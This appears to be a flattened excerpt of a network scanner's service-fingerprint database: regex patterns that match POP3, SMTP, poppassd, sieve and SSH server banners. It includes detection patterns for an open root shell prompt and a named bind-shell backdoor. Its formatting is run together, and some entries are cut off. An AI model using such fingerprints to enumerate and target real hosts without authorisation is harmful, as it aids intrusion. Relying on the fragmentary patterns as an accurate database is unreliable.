+\+OK ArGoSoft Mail Server Pro for WinNT/2000/XP, Version [-.\w]+ \(([-.\w]+)\)\r\n +\+OK ([-\w.]+) ArGoSoft Mail Server Pro for WinNT/2000/XP, Version [\d.]+ \(([\d.]+)\)\r\n +\+OK ArGoSoft Mail Server Plus for WinNT/2000, Version [\d.]+ \(([\d.]+)\)\r\n +\+OK ([-.\w]+) Execmail POP3 \((\d[^)]+)\) +\+OK ([-.\w]+) POP3? MDaemon ready using UNREGISTERED SOFTWARE ([\d.]+) \r\n +\+OK ([-\w_.]+) POP MDaemon ([\d.]+) \xd7\xbc\xb1\xb8\xba\xc3 \r\n +\+OK ([-.\w]+) POP3 server \(Post\.Office v([-.\w]+) release ([-.\w]+) with ZPOP version ([-.\w]+)| p/Post.Office pop3d/ v/2 release 3/ i|w/ZPOP 4 +\+OK CommuniGate Pro POP3 Server ([-.\w]+) ready +\+OK CommuniGate Pro POP3 Server ready <[\d.]+@([-\w_.]+)>\r\n +\+OK\r\n +\+OK POP3 v?([\d.]+) server ready <[\w.]+@([-\w_.]+)>\r\n +\+OK POP3 server ready <\w{11}>\r\n +\+OK Kerio MailServer (\d[-.\w]+) POP3 server ready <([-.\w@:]+)>\r\n +\+OK Kerio MailServer (\d[-.\w]+) POP3 server ready < +\+OK Kerio MailServer (\d[-.\w]+) patch ([\d.]+) POP3 server ready <[\d.]+@\(null\)>\r\n +\+OK Stalker POP3 Server ([\w.]+) at ([-\w_.]+) ready <.*>\r\n +\+OK ([-\w_.]+) POP3 service \(iPlanet Messaging Server ([-\w_.\s]+) \(built .*\)\)\r\n +\+OK Messaging Multiplexor \(iPlanet Messaging Server ([-\w_.\s]+) \(built .*\)\)\r\n +\+OK InterMail POP3 server ready\.\r\n +\+OK WinRoute Pro ([\d.]+) POP3 server ready <[-\w_.]+@unspecified.host>\r\n +\+OK WinRoute Pro ([\d.]+) POP3 server ready <[-\w_.]+@([-\w_.]+)>\r\n +\+OK ([-\w_.]+) POP3 server \(Netscape Messaging Server - Version ([\d.]+)\) ready .*\r\n +\+OK [-\w_.]+ PopMax version ([\d. ]+) POP3 Mail Server Ready, Willing, and Waiting\r\n +\+OK POP3 Welcome to GNU POP3 ([-\d.]+) <[\d.]+@([-\w_.]+)>\r\n +\+OK popserver ([\d.]+) pop3 server ready\r\n +\+OK ([-\w_.]+) NetMail POP3 Agent \R...sion: ([\d.]+) \\r\n +\+OK POP3 server ready \(Worldmail ([\d.]+)\) <[\w.]+@([-\w_.]+)>\r\n +\+OK ([-\w_.]+) POP3 WorkgroupMail ([\d.]+) .*\r\n +\+OK POP3 server ready \(LSMTP v([\w.]+)\) <[\w.]+@([-\w_.]+)>\r\n +\+OK MERCUR POP3-Server \(v([\d.]+) \w+\) for Windows NT ready <[\d.]+@([-\w_.]+)>\r\n +\+OK POP3 server ready QuickMail Pro Server for MacOS ([\d.]+) <[\w.]+@([-\w_.]+)>\r\n +\+OK ready\r\n +\+OK POP3 ([-\w_.]+) \(Version ([-\w.]+)\) http://surgemail\.com\r\n +\+OK ([-\w_.]+) running Eudora Internet Mail Server X ([\d.]+) < +\+OK <[\d.]+@([-\w_.]+)> \[XMail ([\d.]+) POP3 Server\] service ready; +\+OK <[\d.]+@([-\w_.]+)> \[XMail ([\d.]+) \(Linux/Ix86\) POP3 Server\] service ready; +\+OK Samsung Contact POP3 interface ready on: ([-\w_.]+)\r\n +\+OK ([-\w_.]+) POP3 service \(Sun Java\(tm\) System Messaging Server ([-\d.]+) \(built .*\) +\+OK Messaging Multiplexor \(Sun Java\(tm\) System Messaging Server (\d[-\w_.]+) \(built .*\)\)\r\n +\+OK ([-\w_.]+) POP3 server \(DeskNow POP3 Server ([\d.]+)\) ready \r\n +\+OK POP3 SINA \(([-\d.]+)\) Server Ready\r\n +\+OK POP3 on WebEasyMail \[([\d.]+)\] ready\. http://www\.51webmail\.com\r\n +\+OK \(POP3\) hMailServer ([-\w.]+)\r\n +\+OK Welcome to ([\w._-]+), with Code-Crafters Ability Mail Server ([\w._-]+) <[\d.]+@[\w._-]+>\r\n +\+OK DAWKCo POP3 Server v([-\w_.]+) ready < +\+OK Welcome to ([-\w_.]+), powered by Ocean Mail Server ([\d.]+) <[\d.]+@[-\w_.]+>\r\n +\+OK ([-\w_.]+) Solstice \(tm\) Internet Mail Server \(tm\) POP3 ([\d.]+) +\+OK Welcome to RaidenMAILD POP3 service v([\d.]+), +\+OK POP3 FTGate6 server ready <[\d.]+@([\w._-]+)>\r\n +\+OK MERCUR POP3-Server \(v([-\w_.]+) \w+\) for Windows ready <[\d.]+@([-\w_.]+)>\r\n +\+OK 4D Mail ([-\w_.]+) ready < +\+OK ([-\w_.]+) POP3 ([-\w_.()]+) w/IMAP client at +\+OK <-?[\d.]+@([-\w_.]+)>, POP3 server ready\.\r\n +\+OK POP3 server ready <[-0-9a-f]+@([-\w_.]+)>\r\n +\+OK Welcome to Arvixe POP3 server\.\r\n +\+OK POP3 Server ready\r\n +\+OK POP3 server ready\r\n +\+OK POP3 server ([-\w_.]+) ready <[\d.]+@[-\w_.]+>\r\n +\+OK ([-\w_.]+) POP3 Server \(Version ([\w.]+)\) ready at <.*>\r\n +\+OK popd-([\d.]+) ready \r\n +\+OK POP3 server at ([-\w_.]+) ready <[\d.]+@ +-ERR Permission denied - closing connection\.\r\n +\+OK ([-\w_.]+) <[\d.]+@[-\w_.]+>\r\n +\+OK <[\d.]+@([-\w_.]+)>\r\n +\+OK POP3 server ready <[\d.]+@([-\w_.]+)>\r\n +\+OK ready <[\d.]+@([-\w_.]+)>\r\n +\+OK Scalix POP3 interface ready on: ([-\w_.]+)\r\n +\+OK POP3 Welcome to ([-\w_.]+) using the Internet Anywhere Mail Server Version: ([\d.]+)\. Build: (\d+) by True North Software, Inc\. +\+OK Welcome to mpopd V([\d.]+)\.\.\.\. :\)\r\n +\+OK [-\w_.]+ Welcome to the mail server\.\r\n +\+OK CMailServer ([\d.]+) POP3 Service Ready\r\n +\+OK ([-\w_.]+) running EIMS X ([\w.]+) < +\+OK POP3 server \(Neon Mail Server System Advance ([-\w_.]+), [^)]*\) ready ([-\w_.]+)\. < +\+OK Welcome to the Atmail POP3 server - Login with user@domain\.\r\n +\+OK Dovecot DA ready\.\r\n +Unable to open trace file \"/var/spool/popper/ +\+OK POP3D\(\*\) Server PMDFV([\w._-]+) at .* <\w+@([\w._-]+)>\r\n +\+OK Pop3 ready\.\r\n +\+OK ([\w._-]+) Cyrus POP3 v([\w._-]+)-OS X Server ([\w._-]+):\t9L1 server ready <[\d.]+@[\w._-]+>\r\n +\+OK Kerio Connect ([\w._ -]+) POP3 server ready <[\d.]+@([\w._-]+)>\r\n +\+OK Welcome NewsGator Online Services POP3 Server version ([\w._-]+)\r\n +\+OK POP3 AnalogX Proxy (\d[-.\w]+) \(Release\) ready\.\n +Proxy\+ POP3 server\. Insecure access - terminating\.\r\n +\+OK Proxy-POP server \(DeleGate/([\d.]+) by ysato AT delegate DOT org\) at ([-\w_.]+) starting\.\r\n +\+OK POP3 Y(?:ahoo)?POPs! proxy ready\r\n +\+OK POP3 \(Spampal\) server ready \(USER command must include mailserver name\)\r\n +\+OK Mirapoint POP3PROXY ([-\w.]+) server ready\r\n +\+OK AVG POP3 Proxy Server Beta - ([\d/.]+) \[[\d.]+\]\r\n +\+OK AVG POP3 Proxy Server ([\d/.]+) \[[\w/.]+\]\r\n +\+OK AVG POP3 Proxy Server <[\w.]+@[-\w_.]+> ([\d/.]+) \[[\d/.]+\]\r\n +-ERR AVG POP3 Proxy Server: Cannot connect to the mail server!\r\n +\+OK POP3 Spam Inspector Spam Filter Gateway Version ([\d.]+) Ready\.\r\n +\+OK MailMarshal\(([\d.]+)\) POP3 server ready <[\d.]+@([-\w_.]+)>\r\n +\+OK HTML2POP3 server ready \(([\d.]+)\)\r\n +\+OK ([-\w_.]+) POP3 proxy ready\r\n +\+OK AVG POP3 Proxy Server <[\d.]+@([-\w_.]+)> ([\d.]+)/[\d.]+ \[[\d/.]+\]\r\n +\+OK InterScan VirusWall POP3 Proxy\r\n +-ERR 403 The requested host is forbidden by WinProxy\. See your network administrator\.\n +\+OK MrPostman webmail proxy ready\r\n +\+OK F-Secure/fsigk_pop/\d+/[-\w_.]+ starting\.\r\n +\+OK hello from popgate\(([\d.]+)\)\r\n +\+OK \[ISafe POP3 Proxy\] \r\n +\+OK <[\d.]+@([-\w_.]+)> \[ISafe POP3 Proxy\] \r\n +\+OK UserGate: forward ready\r\n-ERR UserGate: Mistake of the protocol\r\n +\+OK kingate pop3 proxy\r\n +\+OK avast! POP3 proxy ready\.\r\n +\+OK O3SIS UMA Proxy POP3 Server ([\w._-]+)\r\n +200 ([-._\w]+) poppassd v?([-._\w]+) +200 poppassd hello, who are you\?\r\n +200 hello there, who are you\?\r\n +200 hello there, please tell me who you are\r\n +200 poppassd v([\w.]+) for Digital Unix with C2 security Hello, who are you\?\r\n +200 ([-.+\w]+) MercuryW PopPass server ready\.\r\n| p|Mercury/32 poppass service +200 X1 NT-PWD Server ([-.+\w]+) \(IMail (\d[-.\w]+)\)\r\n +200 CommuniGate Pro PWD Server (\d[-.\w]+) ready < +550 Login failed - already \d+/\d+ users connected sorry \(use G_CON_PERIP_EXCEPT to bypass\) \(IP=[\d.]+\)\r\n +200 Post\.Office v([\d.]+) password server ready\r\n +\+OK [-\[\]\(\)!,/+:<>@.\w ]+\r\n +lpd \[@([-\w_.]+)\]: connected from invalid port \(\d+\)\n| p|BSD/Linux lpd +lpd: Host name for your address \(\d+\.\d+\.\d+\.\d+\) unknown\n +([-\w_.]+): /usr/lib/lpd: Malformed from address\n +\d+-201 ill-formed FROM address\. +\0\.[\w._/-]+/Library/Preferences/PyCharm([\w._-]+)\0\)[\w._/-]+/Library/Caches/PyCharm[\w._-]+ +QAS2 +\0\0\x01V\xff\xff\xff\xff\xff\xffRT\0\x124V\x08\0E.\x01H...\0.\x11..\0\0\0\0\xff\xff\xff\xff\0D\0C\x014.{1,2}\x01\x01\x06\0......\0{18}RT\0\x124V\0{202}c\x82Sc5\x01 +\r\nHello, this is [Qq]uagga \(version (\d[-.\w]+)\)\.\r\nCopyright 1996-200 +200-?RAP 1 ([-\w_.]+) ([-\w_.]+) radmind access protocol\r\n +\0.\0\x01\0\0\0\0.*\x0b\0\0\0\0([-\w_]+)\x00437 +_realplayfavs_::([\w\s]+)::connected\0 +(\d+\.\d+\.\d+) G\0\0\0\xb6\0.\t +\xe1\xe7\xef\xf0\0\0\x00.\(Righteous Backup Linux Agent\) ([^\xe1]+)\xe1\xe7\xe6\x07\0\x01\0 +\xe1\xe7\xe6\x07\0\x01\0 +roku: ready\r\n +\+host=cashew version=([\d.]+) uptime=[\d+:]+ audio-bits=\d+ audio-byte-order=\w+-endian +\0\0\0.NI_RTERR\0.\0\0\xff\xff\xff\xfb\0\0\0.\*ERR\*\x001\0connection timed out\0-5\0NI \(network interface\)\x007\d0\x003\d\0nirout\.cpp\x00\d\d\d\d\0RTPENDLIST::timeoutPend: CONNECTED timeout\0\w+ +\w+ +\d+ +\d+:\d+:\d+ +\d+\0\0\0\x0046\0SAProuter ([\w._ ()-]+) on '([\w._-]+)'\0\0\0\0\0\*ERR\*\0\0\0\0\0 +\x02\x1c50\x1c\x03\0\0\0\0 +\"IMPLEMENTATION\" \"Cyrus timsieved v([\w._-]+-Debian[- ][\w._+-]+)\"\r\n +\"IMPLEMENTATION\" \"Cyrus timsieved \(Murder\) v([-.\w]+)\"\r\n +\"IMPLEMENTATION\" \"Cyrus timsieved v([\w_.]+)-OS X ([^"]+)\"\r\n +\"IMPLEMENTATION\" \"Cyrus timsieved v(\d[-.\w]+)\"\r\n| p/Cyrus timsieved/ v/1/ i|included w/cyrus imap +\"IMPLEMENTATION\" \"dovecot\"\r\n +\"IMPLEMENTATION\" \"DBMail timsieved ([\w._-]+)\"\r\n +/usr/share/pysieved/plugins/dovecot\.py:27: DeprecationWarning: The popen2 module is deprecated\. Use the subprocess module\.\n import popen2\n\"IMPLEMENTATION\" \"pysieved ([\w._+-]+)\"\r\n +\"IMPLEMENTATION\" \"Dovecot Pigeonhole\"\r\n\"SIEVE\" \"[\w._;-]+(?:\s+[\w._;-]+)*\"\r\n\"NOTIFY\" \"mailto\"\r\n\"SASL\" \"[\w._;-]*(?:\s+[\w._;-]+)*\"\r\n\"STARTTLS\"\r\n\"VERSION\" \"([\w._-]+)\"\r\nOK \"Dovecot ready\.?\"\r\n +SGMS Scheduler SGMS (\d+) ([\d.]+) .*\n> +t\x03\0\0 +\x01remshd: Kerberos Authentication not enabled\.\n +\x01remshd: Error! Kerberos authentication failed +(?:ba)?sh-\d\.\d\d\w?# +:: w4ck1ng-shell \(Private Build v([\w._-]+)\) bind shell backdoor :: \n\n +GENERAL: \d+ \d+\n +220 SLNP (\w+)@[vV]ersion:\s?V?([^@]+)@user:([^@]+)@pid:\d+\n +220 ([-\w_.]+) PGP Universal service ready \(proxied server greeted us with: (.*)\)\r\n +220 ([-/.+\w]+) MailGate ready for ESMTP on +220 ([-/.+\w]+) SMTP ready to roll\r\n +220 ([-/.+\w]+) Internet Rex ESMTP daemon at your service\.\r\n +220 ([-.+\w]+) ESMTP NetIQ MailMarshal \d[-.\w]+ Service Pack (\w+) \(v(\d[-.\w]+)\) Ready\r\n +554-([-.+\w]+)\.us\r\n554 Access denied\r\n +220.*?MERCUR SMTP[\s-]Server \(v([^)]+)\) for ([-.\w ]+) ready at +220 ([-.\w\d]+) ESMTP \([a-fA-F0-9]{32}\)\r\n +554 Service unavailable; Client host \[[\w._-]+\] blocked using Barracuda Reputation; +220 ([-.+\w]+) Mercury/32 v(\d[-.\w]+) ESMTP server ready\.\r\n| p|Mercury/32 smtpd +520 Connection not authorised from this address\.\r\n +554 SMTP service not available\r\n +220 ([-\w_.]+) <1\d+\.\d+@[-\w_.]+> \[XMail (\d[-.\w]+) ESMTP Server\] service ready +421 \[XMail ([\d.]+) \(Linux/Ix86\) ESMTP Server\] - Server does not like Your IP\r\n| p/XMail SMTP server/ v/1/ i|Linux/x86 +220 ([-.\w]+) FirstClass ESMTP Mail Server v(\d[-.\w]+) ready\r\n +220 ([-.\w]+) AppleMailServer (\d[-.\w]+) SMTP Server Ready\r\n +220 ([-.\w]+) eXtremail V(\d[-.\w]+) release (\d+) rev(\d+) ESMTP server ready \.\.\.\r\n +220 ([-.\w]+) service desk (\d[-.\w]+) SMTP Service Ready for input\.\r\n +220 ([-.\w]+) VPOP3 SMTP Server Ready\r\n +421 Insufficient System Storage\.\(IMail ([\d.]+)\)\r\n +220 \[?([-.+\w]+)\]? Microsoft ESMTP MAIL Service, Version: ([-\w.]+) ready +220 ([-\w_.]+) Microsoft ESMTP MAIL Service ready at +220 ([\w._-]+) Microsoft ESMTP MAIL Service Version: ([\w._-]+)\r\n +220 ([-.+\w]+) ESMTP Server \(Microsoft Exchange Internet Mail Service ([-\w.]+)\) ready +220 \+OK Microsoft Exchange SMTP server version ([\d.]+) +220[- ].*\r\n220[- ]([^\r\n]+) ESMTP Exim +220 CheckPoint FireWall-1 secure ESMTP server\r\n +220 CheckPoint FireWall-1 secure SMTP server\r\n +220 ([-.+\w]+) running IBM AS/400 SMTP V([\w]+)| p|IBM AS/400 smtpd +220 ([-.+\w]+) ESMTP MailEnable Service, Version: (\d[\w.]+)- ready at +220 ([-.+\w]+) ESMTP MailEnable Service, Version: \d+--([\d.]+) ready at +220 ([-.+\w]+) ESMTP MailEnable Service, Version: ([\w._-]+) ready at +530 ([-.+\w]+) ESMTP MailEnable Service, Version: ([\w._-]+) denied access at +220 ([-.+\w]+) SMTP/smap Ready\.\r\n +220 ([-.+\w]+) ESMTP service \(Netscape Messaging Server ([-.+ \w]+) \(built +220-InterScan Version (\S+) .*Ready\r\n220 ([-.+\w]+) NTMail \(v([-.+\w]+)/.* ready +220-InterScan Version (\S+) .*Ready\r\n220 ([-.+\w]+) ESMTP Postfix\r\n +220-InterScan Version (\S+) .*Ready\r\n220 ([-.+\w]+) Microsoft ESMTP MAIL Service, Version: ([\d.]+) ready at +220 Trend Micro ESMTP ([-.+\w]+) ready\.\r\n +220(\S+) WebShielde(\w+)/SMTP Ready. +220 ([-.+\w]+) ESMTP MailMasher ready to boogie\r\n +220 ([-.\w]+) ESMTP Postfix \(([-.\w]+)\) \(([-.\w ]+)\) +220 [\*\d\ ]{2,300}\r\n +220 ArGoSoft Mail Server Pro for WinNT/2000/XP, Version ([-.\w]+) \(([-.\w]+)\)\r\n +220 ([-\w.]+) ArGoSoft Mail Server Pro for WinNT/2000/XP, Version [\d.]+ \(([\d.]+)\)\r\n +220 ([-\w.]+) ArGoSoft Mail Server, Version [\d.]+ \(([\d.]+)\)\r\n +220 ([-\w_.]+) ArGoSoft Mail Server Freeware, Version [\d.]+ \(([\d.]+)\)\r\n +220 ([-.\w]+) ESMTP Service. Welcome.\r\n +220 ([-.\w]+) Mercury (\d[-.\w]+) ESMTP server ready\.\r\n +220 ESMTP Service \(Lotus Domino Release ([\w._-]+)\) ready at +220 ([-.\w]+) ESMTP Service \(Lotus Domino Release (\d[-.\w ]+)\) ready +220 ([-.\w]+) ESMTP Service \(Lotus Domino (\d[-.\w ]+)\) ready at +220 ESMTP Service \(Lotus Domino Build V([\w_]+) Beta (\w+)\) ready at +220 ([-.\w]+) ESMTP Service \(Lotus Domino Versione ([\w._ -]+)\) ready +220 ([-.\w]+) Lotus SMTP MTA Service Ready\r\n +220 ([-.\w]+) WebSTAR Mail Simple Mail Transfer Service Ready\r\n +220 ([-.\w]+) SMTP NAVGW (\d[-.\w]+); +220 ([-.\w]+) Kerio MailServer (\d[-.\w]+ patch \d+) ESMTP ready\r\n +220 YSmtp(\S+) ESMTP service ready +220 (\S+) ESMTP WEB.DE V([^\s\;]+) +220 Compuserve Office Mail Service \(lnxc-(\d+)\) ESMTP +220 Welcome to Nemesis ESMTP server on \S+ +220 (\S+).*?SMTP \(Sun Internet Mail Server sims.(\d[^\)]+)\) +220 (\S+) ESMTP XWall v(\d\S+) +220 (\S+) eMail Sentinel (\d+) ESMTP Service ready +220 ([-\w_.]+) Service ready by DvISE PostMan \((\d+)\) ESMTP Server \(Tobit Software, Germany\)\r\n +220 ([-\w_.]+) -- Server ESMTP \(Sun Java\(tm\) System Messaging Server ([\w._-]+) (\d+)bit \(built .*\)\)\r\n +220 (\S+) -- Server ESMTP \(Sun Java System Messaging Server (\d[^\(\)]+) +220[- ][^ ]+ Smail-([^ ]+) +220-([-\w_.]+) Stalker Internet Mail Server V\.([\w.]+) is ready\.\r\n +220 ([-\w_.]+) ESMTP MailMax ([\d.]+) [A-Z][a-z][a-z].*\r\n +220 ([-\w_.]+) Mailmax version ([\d. ]+) ESMTP Mail Server Ready \r\n +220 ([-\w_.]+) running IBM MVS SMTP CS V2R10 on .*\r\n +220 [-\w_]+ ESMTP ([-\w_.]+) \(Debian/GNU\)\r\n +220 ESMTP \(Debian/GNU Mewwwwwww\)\r\n +220 ([\w._-]+) [\w._-]+ ESMTP Postfix \(Debian/GNU\) +220 ([-\w_.]+) ESMTP postfix NO UCE\r\n +220 ([-\w_.]+) SMTPD Server - Postfix\r\n +220 ([-\w_.]+) ESMTP Oracle Email Server SMTP Inbound Server\t([\d.]+) \t Ready\r\n +220 ([-\w_.]+) Mail essentials server \(([\d.]+)\) ready for ESMTP transfer\r\n +220 ([-\w_.]+) ESMTP - WinRoute Pro ([\d.]+)\r\n +220 ([-\w_.]+) ESMTP Lyris ListManager service ready\r\n +220 ESMTP Lyris service ready\r\n +220 ESMTP Lyris ListManager service ready\r\n +220 ([-\w_.]+) SMTP Ready 12\.\r\n +220 ([-\w_.]+) ESMTP server \(Netscape Messaging Server - Version ([\d.]+)\) ready .*\r\n +220 ([-\w_.]+) ZMailer Server ([\w.]+) #\d+ ESMTP ready at .*\r\n +220 Coremail SMTP\(Anti Spam\) System \(\w+\[(\d+)\]\)\r\n +220 ([-\w_.]+) \(PowerMTA(?:\(TM\)) v([\w.]+)\) ESMTP service ready\r\n +220 ([-\w_.]+) ESMTP BorderWare MXtreme Mail Firewall\r\n +220 ([-\w_.]+) SMTP Server \(JAMES SMTP Server\) ready +220 ([-\w_.]+)\s+ESMTP MDaemon ([\d.]+); .*\r\n +220[ -]([-\w_.]+) ESMTP MSA MDaemon ([\d.]+); +421 Sorry, SMTP server too busy right now \(193\); try again later\r\n +220 ([-\w_.]+) ESMTP HT Mail Server v([\d.]+); .*\r\n +220 ([-\w_.]+) ESMTP IceWarp ([\d.]+)[; ] +220 ([-\w_.]+) ESMTP Gruponet IE2020 ([\d./]+);\r\n +220 ([-\w_.]+) mailfront ESMTP\r\n +220 ([-\w_.]+) SMTP Server SLmail ([\d.]+) Ready ESMTP spoken here\r\n +220 ([-\w_.]+) VaMailArmor-([\d.]+)\r\n +220 ([-\w_.]+) ESMTP MailFrontier \(([\d.]+)\)\r\n +220 ([-\w_.]+) WindowsNT SMTP Server v([\w/.]+) ESMTP ready at .*\r\n +220 ([-\w_.]+) \(LSMTP for Windows NT v([\w.]+)\) ESMTP server ready\r\n +220 ([-\w_.]+) SMTP Mandamail ([\d.]+)/[\d.]+\r\n +500 Permission denied - closing connection\.\r\n +220 \(SMTP\) hMailServer ([\d.]+) - Up since .*\r\n +220 ([-\w_.]+) Ready for action \(Mailtraq ([\d.]+)/E?SMTP\)\r\n +220 ([-\w_.]+) SMTP Service Ready \(QuickMail Pro Server for MacOS ([\d.]+)\)\r\n +220 LiteMail SMTP Server Ready\.\r\n +220 ([-\w_.]+) SMTP Server \(DeskNow SMTP Server ([\d.]+)\) ready .*\r\n +220 ([-\w_.]+) SMTP Server \(DeskNow\) ready +220 network-box ESMTP\r\n +220 ESMTP on WebEasyMail \[([\d.]+)\] ready\. http://www\.51webmail\.com\r\n +220 ([-\w_.]+) AntiVir MailGate\r\n +220 server ESMTP KEN! v([\d.]+); .*\r\n +220 ([-\w_.]+) NTMail \(v([\d.]+)/[\w.]+\) ready for ESMTP transfer \r\n +220-([-\w_.]+) Sendmail IBM OS/2 SENDMAIL VERSION ([\w./]+) ready at .*\r\n220 ESMTP spoken here\r\n| p/Sendmail smtpd/ v/2/ o|OS/2 +220 shttp\.srv Simple Mail Transfer Service Ready\r\n +501 Domain must resolve\r\n +220 ([-\w_.]+) ModusMail ESMTP Receiver Version ([\d.]+) Ready\r\n +220 mailmatrix SMTP Server \(Mail Matrix Server\) ready +220-([-\w_.]+) ESMTP .* GoMail V([\d.]+); +220 [-\w_.]+ Winmail Mail Server ESMTP ready\r\n +220 ([-\w_.]+); .* \+\d+\r\n +421 unable to read controls \(#4\.3\.0\)\r\n +554 Please check that your outgoing mail server settings are correct\. Contact your service provider's technical support for assistance\.\n +rblsmtpd: [\d.]+ pid \d+:.*220 rblsmtpd\.local\r\n +220 SurgeSMTP \(Version ([-\w_.]+)\) http://surgemail\.com\r\n +220 ([-\w_.]+) Welcome to RaidenMAILD E?SMTP service v([\d.]+), +220 ESMTP on WinWebMail \[([\d.]+)\] ready\. http://www\.winwebmail +220-W E L C O M E T O Q U A R K M A I L S M T P S E R V I C E !\r\n220 ([-\w_.]+) ESMTP server \(quarkmail server - version ([\d.]+)\) ready +220 .*\r\n221 2\.7\.0 Error: I can break rules, too\. Goodbye\.\r\n +220 ([-\w_.]+) running EIMS X ([\w.]+)\r\n +220 DP-3510\r\n +220 ([-\w_.]+) Axigen ESMTP ready\r\n +421 Unexpected log failure, please try later\r\n +220 ([-\w_.]+) DynFX ESMTP Server ([-\w_.]+) \( +220 ;; ESMTP connection timed out; no servers could be reached Sendmail ([-\w_.]+)/ +554 ([-\w_.]+) ESMTP not accepting messages\r\n +220 ([-\w_.]+) L-Soft HDMail SMTP Service Version: ([-\w_.()]+) ready +220 ([-\w_.]+) Synchronet SMTP Server ([\d.]+)-Win32 Ready\r\n +220 ShareMailPro SMTP Server Ready \r\n +220 ([-\w_.]+) ESMTP Service\(Mail2000 ESMTP Server V([-\w_.]+)\) ready +220 ([-\w_.]+) 4D WebSTAR V Mail \(([-\w_.]+)\) Ready for action\r\n +220 Service ready KM([\w._-]+) smtpd\r\n +220 ([\w_.-]+) cqgreylist - minimal smptd\r\n +220 ([\w_.-]+) ESMTP AnNyungSMTP ([\w._-]+); +220 DP-1820E\r\n +220 ([\w_.-]+) VHCS2 [\w._-]+ (\w+) Managed ESMTP ([\w._-]+)\r\n +220.*SMTP Welcome to the IA eMailServer Standard Edition Version: ([\d.]+ Build: [\d]+) +220 ([\w_.-]+) bizsmtp ESMTP server ready\r\n +220 ([\w_.-]+) ESMTP NetBox\(tm\)\r\n +220 ([\w_.-]+) StrongMail SMTP Service Version: (\S+) ready +421 Service not available, closing transmission channel\r\n +421 Service not available, closing transmission channel \r\n +220 ([\w_.-]+) ESMTP OpenSMTPD\r\n +220 ([\w_.-]+) ESMTP Citadel server ready\.\r\n +220 BEJY V([\w._-]+) SMTP ([\w._-]+) \(c\) \d+-\d+ by BebboSoft, Stefan \"Bebbo\" Franke, all rights reserved ready\r\n +220 Welcome NGOS SMTP Server version ([\w._-]+)\r\n +220 ([\w._-]+) Kerio Connect ([\w._ -]+) ESMTP ready\r\n +220 ([\w._-]+) running IBM VM SMTP Level (\d+) on +421 4\.3\.2 Service not available\r\n +220 ([\w._-]+) Service ready by David\.fx \(([\w._-]+)\) ESMTP Server \(Tobit\.Software, Germany\)\r\n +220 HOST: ([\w._-]+) Supportworks ESMTP Server ([\w._-]+) ready\r\n +220 ([-\w_.]+) SMTP/DeleGate/([\d.]+) ready at .*\r\n +220 ([-/.+\w]+) SMTP AnalogX Proxy (\d[-.\w]+) \(Release\) ready\r\n +220 ([-\w_.]+) ESMTP spamd IP-based SPAM blocker; .*\r\n +220 ESMTP smtprelay service ready\.\r\n +220 ([-\w_.]+) SMTP hotsmtpd v([\d.]+)\. ESMTP-HTTPMail Gateway based on hotwayd\.\r\n +220 ([-\w_.]+) Welcome SpamFilter for ISP SMTP Server v([\d.]+) - Unlicensed Evaluation Copy\r\n +421 proxyplus\.universe SMTP server\. Insecure access - terminating\.\r\n +220 AVG ESMTP Proxy Server Beta - ([\d./]+) \[[\d.]+\]\r\n +220 AVG ESMTP Proxy Server ([\d./]+) \[[\d./]+\]\r\n +554 ([\d.]+) ([-\w_.]+) No mail service\r\n +220 Traffic Inspector SMTP Gate \(SPAM protected\), ver\. ([\w._-]+), ready at.*\r\n +220 mailwall SMTP Server \(Ikarus MailWall by David Grabenweger\) ready\r\n +220 ([-\w_.]+) ESMTP - eXpurgate ([\d.]+) \( +220 CCProxy ([\d.]+) SMTP Service Ready\(Unregistered\)\r\n +NoSpamToday! SMTP Proxy Monitoring Service Ready\.\r\n +220 ([-\w_.]+) ESMTP bitdefender +220 ([-\w_.]+) ESMTP BitDefender Proxy version ([^\r\n]+)\r\n +220 [-\w_.]+ avast! SMTP proxy ready\.\r\n +220 ([-\w_.]+) (SCM\d+)/SMTP Ready\.\r\n +554 You are not allowed to connect\.\r\n +220 ([\w._-]+) ESMTP Symantec Brightmail Gateway\r\n +220 ([\w._-]+) ESMTP server ready \(Alligate v([\w._-]+)\)(?: AUTH ONLY)?\r\n +220 ([\w._-]+)\.ARK Sendmail ready\. \r\n +421 too many connections\r\n +220 ([-\w_.]+) ESMTP Service ready\r\n +220 ([\w._-]+) AVKSMTP Server\r\n +220 (\S+) Welcome to SpamFilter for ISP SMTP Server v(\d\S+) +220[\s-].*?E?SMTP[^\r]*\r\n +550 (\d.\d.\d) ([^\r\n]+) +Statistics from .*\n M msgsfr bytes_from msgsto bytes_to msgsrej msgsdis Mailer\n +220 ([-.\w]+) SNPP server \(HylaFAX \(tm\) Version ([-.\w]+)\) ready.\r\n +220 QuickPage v(\d[-.\w]+) SNPP server ready at +250\r\nProtocol-Version:(\d[\d.]+)\r\nMessage-ID:\d+\r\nDatabase .*\r\nContent-Length:\d+\r\nKey Length:(\d+)\r\n\r\n.*(\w:\\.*ini)\r\n\r\n +SPMD_ACK\0\0\x01\0\x01 +SSH-([\d.]+)-([\d.]+) F-Secure SSH Windows NT Server\r?\n +SSH-([\d.]+)-([\d.]+) dss F-SECURE SSH\r?\n +SSH-([\d.]+)-([\d.]+) F-SECURE SSH.*\r?\n +SSH-([\d.]+)-ReflectionForSecureIT_([-\w_.]+) - Process Software MultiNet\r\n +SSH-([\d.]+)-ReflectionForSecureIT_([-\w_.]+)\r?\n +SSH-(\d[\d.]+)-SSH Protocol Compatible Server SCS (\d[-.\w]+)\r?\n +SSH-([\d.]+)-SSH Compatible Server\r?\n +SSH-([\d.]+)-([\d.]+) SSH Secure Shell Tru64 UNIX\r?\n +SSH-([\d.]+)-(\d+\.\d+\.\d+) SSH Secure Shell +sshd: SSH Secure Shell (\d[-.\w]+) on ([-.\w]+)\nSSH-(\d[\d.]+)- +sshd2\[\d+\]: .*\r\nSSH-([\d.]+)-(\d[-.\w]+) SSH Secure Shell \(([^\r\n\)]+)\)\r?\n +SSH-([\d.]+)-(\d+\.\d+\.[-.\w]+) +SSH-([\d.]+)-OpenSSH_([\w._-]+) Debian-(\S*maemo\S*)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+)[ -]{1,2}Debian[ -_]([^\r\n]+)\r?\n +SSH-([\d.]+)-OpenSSH_[\w.]+-FC-([\w.-]+)\.fc(\d+)\r\n +SSH-([\d.]+)-OpenSSH_([\w._-]+) FreeBSD-([\d]+)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+) FreeBSD localisations (\d+)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+) FreeBSD-openssh-portable-(?:[\w.,]+)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+) 